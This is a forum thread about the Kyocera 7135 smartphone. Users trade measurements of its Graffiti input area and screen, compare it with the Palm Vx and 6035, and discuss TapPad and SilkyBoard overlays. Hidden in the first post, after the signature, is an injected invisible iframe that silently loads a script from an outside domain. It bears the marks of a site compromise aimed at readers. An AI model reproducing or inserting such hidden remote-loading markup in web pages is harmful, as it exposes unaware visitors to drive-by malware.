+ Reply to Thread

Graffiti area dimensions?

Can anyone tell me the exact dimensions of the graffiti area of the 7135? For comparison purposes I have a Palm Vx.

Is the actual graffiti area the same and the silkscreened "buttons" squeezed in closer or is everything proportionally smaller? (I'm assuming its smaller than my Vx since the outside dimensions of the phone are smaller and there wouldn't be much room for a border around the screen.)

I think this would be of interest to anyone using Palm applications that involve an overlay of the area. For example I have come to rely heavily on TapPad. The software will calibrate itself by tapping on a few points on the overlay so the concern is getting an overlay that fits the physical area.

Bonus question: Display screen size? Vx display is 2.25" square.

-Quick<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Graffiti area 3/4 inch x 1 7/8 inch
    Screen 1 7/8 x 1 7/8

Alan

Quick -- Won't a TapPad be unneccasary because the 7135 has a numeric keypad already? Unless you can't live without the other features of the software. Seems to me this is just like a slikypad overlay and if resized it should be able to calibrate to the new dimensions.
    iPhone therefore iAm.

Originally posted by Steve
    Quick -- Won't a TapPad be unneccasary because the 7135 has a numeric keypad already? Unless you can't live without the other features of the software. Seems to me this is just like a slikypad overlay and if resized it should be able to calibrate to the new dimensions.
    Difficult to switch from graffiti characters to punch interspersed numbers on the keyboard while writing something. TapPad is *really* slick if you haven't used it before. It overlays the numeric half of the graffiti area with a full number pad and provides cursor controls, editing buttons (cut, copy, paste, upcase, etc), button for special chars keyboard, etc. around the top and right border. It also incorporates MiddleCapsHack. Truly awesome app.

Yes, it incorporates an overlay that you calibrate. No problem if you have the overlay... no, I never had much luck or desire for the outcome of attempts at printing it on paper and covering it with tape, etc. Brochu software makes really ideal overlays (feel, and durability) that I fear will be a long time coming customized for the 7135. sigh...

-Quick

Yeah and unfortunately the 6035 SilkyBoards don't work correctly on the 7135, so we are all waiting for a 7135 version of SilkyBoard to be released too.
    ~'kito
    pdaPhoneHome Moderator

Graffiti area dimensions - 6035 vs. 7135?

Didn't think of asking this before... How does the graffiti area of the 7135 compare to that of the 6035 (size and shape)? It seems that Tappad makes an overlay for "Kyocera smartphone" which I assume (has to be) is the 6035. Theres still hope:alieneyes

-Quick

Graffiti Area Too Small ?

Is the graffiti area on the 7135 too small? I have a Handspring Visor Prism color PDA that I am thinking about upgrading to the 7135.

The graffiti area seems just perfect to me. You don't need a lot of room to draw letters... unless you are using your feet of course.
    ~'kito
    pdaPhoneHome Moderator